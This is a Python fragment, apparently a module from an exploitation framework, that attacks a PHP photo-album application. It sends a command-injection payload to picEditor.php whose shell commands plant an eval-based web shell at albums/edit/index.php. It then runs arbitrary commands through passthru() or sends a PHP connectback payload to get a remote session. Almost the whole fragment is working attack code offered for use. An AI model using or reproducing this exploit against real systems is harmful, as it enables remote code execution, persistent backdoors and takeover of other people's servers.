self.log("Basic Auth User: %s" % self.basicauth_user)
self.log("VHost: %s" % self.hostname)
if self.ssl:
protocol = "https"
else:
protocol = "http"
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user:
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
else:
auth = None
UA = spkproxy.UserAgent(protocol + "://" + self.host + "/" +
self.basepath,
auth=auth,
hostname=self.hostname,
exploit=self)
if self.command:
self.log("Command: %s" % self.command)
command = self.command
command = "print(startz);passthru('" + command + "');print(endz);"
data = UA.POST(
"picEditor.php",
"newimage=../../images/edit.gif&angle=10;cp%20anycontent.php%20albums/edit/index.php;sed%20-i%20s/php/@eval\(\$_GET[c]\)\;die\(\)\;/%20albums/edit/index.php;"
)
data = UA.GET("albums/edit/index.php?c=%s" %
(urllib.quote_plus(command)))
if "startz" in data:
result = data.split("startz")[1].split("endz")[0]
#self.log("Command data: %s"%prettyprint(data))
self.log("Command result=%s" % prettyprint(result))
ret = 1
else:
self.log("Command not run - service patched?!")
else:
command = self.get_php_to_mosdef().strip()
command = command.replace("/", "`pwd|cut -b1`")
self.log("Command: %s" % command)
self.log("Sending Exploit")
data = UA.POST(
"picEditor.php",
"newimage=../../images/edit.gif&angle=10;cp%20anycontent.php%20albums/edit/index.php;sed%20-i%20s/php/@eval\(\$_GET[c]\)\;die\(\)\;/%20albums/edit/index.php;"
)
data = UA.GET("albums/edit/index.php?c=%s" %
(urllib.quote_plus(command)))
self.log("Data=%s" % data)
self.log("Looking for PHP connectback")
ret = self.ISucceeded()
if ret:
self.setInfo("%s attacking %s:%d - done (success!)" %
(NAME, self.host, self.port))
else:
self.setInfo("%s attacking %s:%d - done (failed)" %
(NAME, self.host, self.port))
return ret
